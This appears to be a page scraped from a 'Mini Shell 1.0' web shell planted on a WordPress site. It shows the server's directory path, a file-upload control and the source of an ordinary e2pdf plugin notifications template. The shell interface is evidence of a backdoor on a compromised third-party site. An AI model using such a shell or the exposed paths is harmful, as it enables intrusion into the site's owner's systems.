HOME


Mini Shell 1.0
DIR: /home/dhnidqcz/pragmaticsng.org/wp-content/plugins/e2pdf/classes/view/blocks/
Upload File :
Current File : //home/dhnidqcz/pragmaticsng.org/wp-content/plugins/e2pdf/classes/view/blocks/notifications.php
<?php
if (!defined('ABSPATH')) {
    die('Access denied.');
}
?>
<?php foreach ($this->get_notifications() as $key => $notify) { ?>
    <?php if ($notify['type'] === 'update') { ?>
        <div id="message" class="e2pdf-notice notice notice-success is-dismissible">
            <p><?php echo $notify['text']; ?></p>
        </div>
    <?php } elseif ($notify['type'] === 'error') { ?>
        <div id="message" class="e2pdf-notice notice notice-error is-dismissible">
            <p><b><?php echo __('[ERROR]', 'e2pdf'); ?></b> <?php echo $notify['text']; ?></p>
        </div>
    <?php } elseif ($notify['type'] === 'notice') { ?>
        <div id="message" class="e2pdf-notice notice notice-warning is-dismissible">
            <p><?php echo $notify['text']; ?></p>
        </div>
    <?php } ?>
<?php } ?>